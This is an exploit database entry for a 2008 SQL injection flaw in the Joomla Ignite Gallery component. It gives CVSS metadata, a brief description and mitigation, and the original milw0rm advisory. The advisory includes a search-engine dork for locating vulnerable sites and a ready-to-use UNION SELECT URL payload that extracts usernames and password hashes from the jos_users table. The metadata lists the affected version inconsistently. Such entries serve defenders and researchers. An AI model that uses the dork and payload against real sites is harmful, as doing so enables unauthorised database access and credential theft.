Joomla Component Ignite Gallery SQL Injection Vulnerability

vendor:

Ignite Gallery

by:

H!tm@N

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ignite Gallery

Affected Version From: 2000.8.3

Affected Version To: 2000.8.3

Patch Exists: NO

Related CWE: N/A

CPE: a:ignitejoomlaextensions:ignite_gallery:0.8.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component Ignite Gallery SQL Injection Vulnerability

An attacker can exploit this vulnerability by crafting a malicious SQL query and sending it to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the request. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed. Additionally, the application should be configured to use the least privileged user account with access to the database.

Source

Exploit-DB raw data:

#############################################################################
#							                    #
#        Joomla Component Ignite Gallery SQL Injection Vulnerability        #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Ignite Gallery (com_ignitegallery)"
[~] Version:       "0.8.3" 
[~] Author:        "Matt Thomson"
[~] Author E-mail: "matt@ignitejoomlaextensions.com"
[~] Author URL:    "www.ignitejoomlaextensions.com"

########################################

[~] DORK: inurl:"com_ignitegallery"

########################################

[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-10]